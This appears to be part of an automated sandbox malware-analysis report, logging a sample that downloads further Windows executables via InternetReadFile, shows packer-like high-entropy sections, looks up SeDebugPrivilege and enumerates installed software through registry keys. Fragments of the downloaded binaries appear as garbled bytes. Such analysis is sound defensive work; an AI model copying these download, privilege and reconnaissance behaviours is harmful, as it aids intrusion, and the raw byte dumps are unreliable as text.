·dþÿÿÎÇ<ÉIèÿvè¿èYýÿÿè\|ýÿÿè#lýÿÿè)º·\ýÿÿÎÇDÉIètÿvèèóÇLýÿÿ@ÉIY9Týÿÿòÿ·PýÿÿTýÿÿèXèóÇ<ýÿÿ@ÉIY9Dýÿÿñÿ·@ýÿÿDýÿÿè.èóÇ,ýÿÿ@ÉIY94ýÿÿðÿ·0ýÿÿ4ýÿÿèèY$ýÿÿÉù·ýÿÿÎÇ<ÉIè£ÿvèÚçYýÿÿÉãüüÿÿÉéèüÿÿè-ÐüÿÿèÄüÿÿÉÙÌüÿÿ¸üÿÿÉÙlüÿÿÀüÿÿèï\üÿÿèäLüÿÿèÙüÿÿèµ_^[ÉÃ`ýÿÿ°Àt#ÿ0ÿ5MÿÅI`ýÿÿ°ÉtQèØùÿÿF;·dýÿÿfýÿÿë¿qQèþàÎö þÿÿëëVñW3ÿN>è5N$è-N4èsPN`èkPèjÇ¼<ÉI¾À¾Ä¾ÈèiæY8Æ_^ÃVWùÉtQè_·¼ÎÇ<ÉIè6ÿvèmæYèÜO`è¯QO4è§QO$èÄO_^éºVñW3ÿ9~f_^ÃVñjVè×åYYÆ^ÂVñW3ÿ9~wf_^ÃFjÿ4¸è°åYYF$¸G;~sÝëâSVñ3ÛW¾d9u%\|èÿÿÿ¾p9u9=_^[ÃÏèÛëÎÏè=ëÚWùxÿÿÿ@Ç8xÿÿÿhÉIèhOðèóOàèëOÐèãOÀèÛO¬èÓOèËOèÃ\|ÿÿÿÉug_ÃVéË VWñè¶@öÉ _^ÃVqöÜ ^ÃWùu&?ÿu_ÃVw$Ïèij(WèäþYYöuæ^_ÃÿwèÓäYëÏVñÉtQèþÿÿìèP¼è&¬èèèN^éVWù3öD÷ÀN Fþ\|î_^ÃSVñ3ÛW8^ T 8^uNy8ÉtQè~^ ÿ_^[Ã³ëóVñN è²µÎè«µj@VèÐãYYÆ^ÂUìSÙVW{ {u)EÏ0è~µ7ÇGC{ _^[u Æ@]Â8ëÒ@8ëî3ÀÇMd3Éf£2MA¢4Mj 8M <M @M¢PMf£üM ôM øM¹úX M£DM£HM LMÃUìWù rVj@èãYÿuðÎèON8w^ÿ_]ÂUìVuWùVgèëåFO GFGFGF aPèÉåF0G0Ç_^]Â3Ò3À@AQQQQA,ÁQ Q(Q0ÃVñ&NèWèþèó¬èè¼èÝìè LjèEâÇ$\|ÉI ÿ ÇIFÆ^ÃjAZ @êuõÁÃSV5ÆI3ÛWùjXSGfÇG____j[ÇGÿÖSjG)ÿÖSh request_handle: 0x00cc000c	1	1
InternetReadFile April 19, 2024, 1:10 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Pêþt¹þt¹þt¹_w¸þt¹_q¸Ôþt¹_s¸þt¹Ö¹þt¹Öp¸þt¹Öw¸þt¹Öq¸Oþt¹_p¸þt¹_r¸þt¹_u¸þt¹þu¹4ÿt¹ç\|}¸þt¹ç\|t¸þt¹ç\|¹þt¹þã¹þt¹ç\|v¸þt¹Richþt¹PELfà'42°XP@ÀXñv#@dïWLmPìµTïWïWtä@ @> @à.rsrcìµPN @À.idata Ð @À 0* Ò @àkqbsyizv`P?TÔ @àpmredwmq°X(#@à request_handle: 0x00cc000c	1	1
InternetReadFile April 19, 2024, 1:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÆÞÉ ¿§^¿§^¿§^Ù×£_¿§^Ù×¤_¿§^Ù×¢_2¿§^WÒ¢_Ä¿§^WÒ£_¿§^WÒ¤_¿§^Ù×¦_¿§^¿¦^C¿§^Ñ®_¿§^Ñ§_¿§^ÑX^¿§^Ñ¥_¿§^Rich¿§^PEdiäeð" ÀRh P` Xx ø`(0ô°p Ðè.textø¾À `.rdataâÍÐÎÄ@@.dataL» D@À.pdata(`®Ö@@_RDATA@@.rsrcø @@.relocô0@BHì(A¸ HnH à»èÓ H HÄ(éÏòÌÌÌHì(A¸ HnH °Âè£ H LHÄ(éòÌÌÌHì(A¸HnH Ãès H HÄ(éoòÌÌÌHì(A¸ H_nH ½èC H ÌHÄ(é?òÌÌÌHì(A¸HWnH àÁè H HÄ(éòÌÌÌHì(A¸H?nH 0ºèãH LHÄ(éßñÌÌÌHì(E3ÀH²ÏH cÂè¶H HÄ(é²ñÌÌÌÌÌÌHì(E3ÀHÏH ÓÂèH ÏHÄ(éñÌÌÌÌÌÌHì(E3ÀHRÏH C¼èVH HÄ(éRñÌÌÌÌÌÌHì(E3ÀH"ÏH ó¸è&H OHÄ(é"ñÌÌÌÌÌÌHì(A¸HomH À¹èóH HÄ(éïðÌÌÌHì(A¸HOmH pÅèÃH ÌHÄ(é¿ðÌÌÌHì(A¸H/mH ÁèH HÄ(éðÌÌÌHì(A¸HmH p·ècH LHÄ(é_ðÌÌÌHì(A¸$HïlH ¹è3H HÄ(é/ðÌÌÌHì(A¸HçlH ðÁèH ÌHÄ(éÿïÌÌÌHì(A¸HÏlH @ºèÓH HÄ(éÏïÌÌÌHì(A¸H¿lH P½è£H LHÄ(éïÌÌÌHì(A¸HlH @½èsH HÄ(éoïÌÌÌHì(A¸HlH P¼èCH ÌHÄ(é?ïÌÌÌHì(A¸HglH À¾èH HÄ(éïÌÌÌHì(A¸HGlH p¿èãH LHÄ(éßîÌÌÌHì(A¸LH/lH ºè³H HÄ(é¯îÌÌÌHì(A¸HOlH 0¶èH ÌHÄ(éîÌÌÌHì(A¸dH?lH ÂèSH HÄ(éOîÌÌÌHì(A¸HwlH ¿è#H LHÄ(éîÌÌÌHì(A¸H_lH ½èóH HÄ(éïíÌÌÌHì(A¸HOlH °µèÃH ÌHÄ(é¿íÌÌÌHì(A¸H/lH À½èH HÄ(éíÌÌÌHì(A¸(HlH ð»ècH LHÄ(é_íÌÌÌHì(A¸HlH Àè3H HÄ(é/íÌÌÌHì(A¸HïkH °ÂèH ÌHÄ(éÿìÌÌÌHì(A¸HÏkH ½èÓH HÄ(éÏìÌÌÌHì(A¸H¯kH Ð¿è£H LHÄ(éìÌÌÌHì(A¸HkH ¹èsH HÄ(éoìÌÌÌHì(A¸,HkH 0ºèCH ÌHÄ(é?ìÌÌÌHì(A¸HkH À¸èH HÄ(éìÌÌÌHì(A¸HokH ½èãH LHÄ(éßëÌÌÌHì(A¸$HOkH ¿è³H HÄ(é¯ëÌÌÌHì(A¸HGkH 0ºèH ÌHÄ(éëÌÌÌHì(A¸H/kH @²èSH HÄ(éOëÌÌÌHì(A¸HkH °ºè#H LHÄ(éëÌÌÌHì(A¸HïjH ¶èóH HÄ(éïêÌÌÌHì(A¸H×jH °»èÃH ÌHÄ(é¿êÌÌÌHì(E3ÀHÈH #¸èH HÄ(éêÌÌÌÌÌÌHì(A¸HjH Ð³ècH LHÄ(é_êÌÌÌHì(A¸HojH ·è3H HÄ(é/êÌÌÌHì(A¸HWjH ð²èH ÌHÄ(éÿéÌÌÌHì(A¸H7jH ½èÓH HÄ(éÏéÌÌÌHì(A¸LHgH °·è£H LHÄ(ééÌÌÌHì(A¸HÇiH À·èsH HÄ(éoéÌÌÌHì(A¸dH/gH °¸èCH ÌHÄ(é?éÌÌÌHì(A¸HiH ½èH HÄ(ééÌÌÌHì(A¸HoiH ð»èãH LHÄ(éßèÌÌÌHì(A¸HWiH ·è³H HÄ(é¯èÌÌÌHì(A¸H7iH ³èH ÌHÄ(éèÌÌÌHì(A¸HiH ½èSH HÄ(éOèÌÌÌHì(A¸HçhH ¶è#H LHÄ(éèÌÌÌHì(A¸H¿hH `´èóH HÄ(éïçÌÌÌHì(A¸HhH Ð±èÃH ÌHÄ(é¿çÌÌÌHì(A¸HhH `®èH HÄ(éçÌÌÌHì(A¸HohH P·ècH LHÄ(é_çÌÌÌHì(A¸0HOhH ¼è3H HÄ(é/çÌÌÌHì(A¸HWhH ð»èH ÌHÄ(éÿæÌÌÌ request_handle: 0x00cc0018	1	1
InternetReadFile April 19, 2024, 1:10 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Pêþt¹þt¹þt¹_w¸þt¹_q¸Ôþt¹_s¸þt¹Ö¹þt¹Öp¸þt¹Öw¸þt¹Öq¸Oþt¹_p¸þt¹_r¸þt¹_u¸þt¹þu¹4ÿt¹ç\|}¸þt¹ç\|t¸þt¹ç\|¹þt¹þã¹þt¹ç\|v¸þt¹Richþt¹PELfà'4H@[P@P[xø$@ôZL^rPø²äZZtä@ @> @à.rsrcø²PN @À.idata Î @À À+ Ð @àjrhisphs`à@VÒ @àkqqwnxef@[($@à request_handle: 0x00cc000c	1	1
InternetReadFile April 19, 2024, 1:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPELjäeà!$ìf@@ ¡¼¡PÐøàÔð8(@@L.text6#$ `.rdata4i@j(@@.data°@À.rsrcøÐ@@.relocÔà @Bj h¹`¸èDhà,è}QYÃÌÌÌj h,¹x¸èïCh@-è]QYÃÌÌÌjhP¹¸èÏCh -è=QYÃÌÌÌjhh¹¨¸è¯Ch.èQYÃÌÌÌjh¹À¸èCh`.èýPYÃÌÌÌjh¹Ø¸èoChÀ.èÝPYÃÌÌÌjh¹ð¸èOCh /è½PYÃÌÌÌjh¹¹è/Ch/èPYÃÌÌÌhà/èPYÃÌÌÌÌh@0è~PYÃÌÌÌÌh 0ènPYÃÌÌÌÌj?h¹h¹èßBh1èMPYÃÌÌÌhà2è>PYÃÌÌÌÌh2è.PYÃÌÌÌÌh 2èPYÃÌÌÌÌhÀ1èPYÃÌÌÌÌh`1èþOYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔAfÖEÀPèN_ÄÆ^]ÂÌÌÌI¸ÜÉEÁÃÌÌUìVñFÇÔAPè_ÄöEtjVèLÄÆ^]ÂAÇÔAPèU_YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAðÇ4BÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿh¡EôPè'_ÌÌÌÌUìVñWÀFPÇÔAfÖEÀPè~^ÄÇ4BÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔAfÖEÀPè>^ÄÇàAÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìjÿh'd¡Pì¡°3ÅEðVWPEôd£ù½´ûÿÿ½¸ûÿÿ½¸ûÿÿÇEü}ø}0î}HäÇèûÿÿÇìûÿÿÆØûÿÿÆEüÀûÿÿj/hÇÐûÿÿÇÔûÿÿÆÀûÿÿèn@jjjjh¸ÆEüÿ0A}ÈjjjjjE¸ûÿÿCEjPPQÿ4A}4ÈjjjjjE ûÿÿCE Ph¼Qÿ8A}LM8ÿuHCM8ð½ÔûÿÿÀûÿÿQÿµÐûÿÿCÀûÿÿPVµ¤ûÿÿÿ<A¼ûÿÿPhÿðûÿÿPVÿ@AÀfff½¼ûÿÿîðûÿÿÇûÿÿÇûÿÿPÆpûÿÿ@Éuù+ÂpûÿÿPðûÿÿPèS?ÆEüpûÿÿ¼ûÿÿ9ûÿÿÇûÿÿBûÿÿ½ûÿÿQCpûÿÿûÿÿPÇûÿÿÆûÿÿè?ÆEüµûÿÿ½ûÿÿ½ûÿÿèûÿÿC÷ìûÿÿûÿÿ+Âµ°ûÿÿ¬ûÿÿQ;ÈwC½ìûÿÿµØûÿÿÿµ°ûÿÿCµØûÿÿèûÿÿPèµsûÿÿÄ¬ûÿÿÆÆë VÆ¨ûÿÿÿµ¨ûÿÿQØûÿÿèTD½ûÿÿÆEüûÿÿør+HÇùrüÁ#+ÇÀüøQWè9HÄÆEüûÿÿúr/pûÿÿBÁúrIüÂ#+ÁÀüøÕRQèûGÄ¼ûÿÿ=¿µ¤ûÿÿÆðûÿÿ¼ûÿÿPhÿðûÿÿPVÿ@AÀþÿÿ½´ûÿÿV5DAÿÖÿµ ûÿÿÿÖÿµ¸ûÿÿÿÖØûÿÿÔûÿÿ¸ÇGÇGÆØûÿÿó~èûÿÿfÖGÇèûÿÿìûÿÿúr5ÀûÿÿBÁúrIüÂ#+ÁÀüøúRQè GìûÿÿÄÇÐûÿÿÇÔûÿÿÆÀûÿÿør1ØûÿÿPÁúrIüÂ#+ÁÀüø£RQèÉFÄUÇèûÿÿÇìûÿÿÆØûÿÿúr,MBÁúrIüÂ#+ÁÀüøTRQèzFÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøRQè4FÄULÇE0ÇE4ÆE úÉM8BÁúIüÂ#+ÁÀüøÀéjÇGÏÇGhÆè·;Uúr(MBÁúrIüÂ#+ÁÀüøwvRQèEÄU4ÇEÇEÆEúJÿÿÿM BÁú.ÿÿÿIüÂ#+ÁÀüøw,éÿÿÿRQèMEÄÇMôd Y_^Mð3Íè Eå]Ãè&~è¿IÌUìjÿhH'd¡Pì@¡°3ÅEðVWPEôd£=0¹3ÀPh¹P¹Eè3öèÉ:ÿ§FOæÿyNÎÿÿÿFÆEè¶ÑÂuä%ÿyH ÿÿÿ@Eè¶ÆÆEèjÇEÜÇEàÆMÌ¶ÆÂÆEÌ¶À¶ÆEïEïPè@:EÌÇEüPºP¹M´èx;ðÄþP¹t\| d¹ùr.¡P¹AùrPüÁ#+ÂÀüøïÂQPè÷CÄÇ`¹Çd¹ÆP¹P¹ó~FfÖ`¹ÇFÇFÆUÈúr(M´BÁúrIüÂ#+ÁÀüøwzRQèCÄÇEüÿÿÿÿUàÇEÄÇEÈÆE´úr(MÌBÁúrIüÂ#+ÁÀüøw1RQè;CÄÿtuäéZþÿÿMôd Y_^Mð3ÍèCå]Ãè \|ÌÌÌÌÌÌÌÌÌÌUìjÿh'd¡PìH¡°3ÅEðVWPEôd£ù}è}ÄÇEäÇGÇGÆÇEüÇEäèýÿÿ¡d¹¾P¹P¹ø¹ ¹Cò=4¹C ¹+ÎMàDø¹P¹¡`¹CÊÁ;ð9EàMÈjÇEØÇEÜ02EïEïPÆEÈ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x0002ea00', u'virtual_address': u'0x00001000', u'entropy': 7.974297481762849, u'name': u' \\x00 ', u'virtual_size': u'0x00068000'}

entropy

7.97429748176

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 19, 2024, 1:03 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000504 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
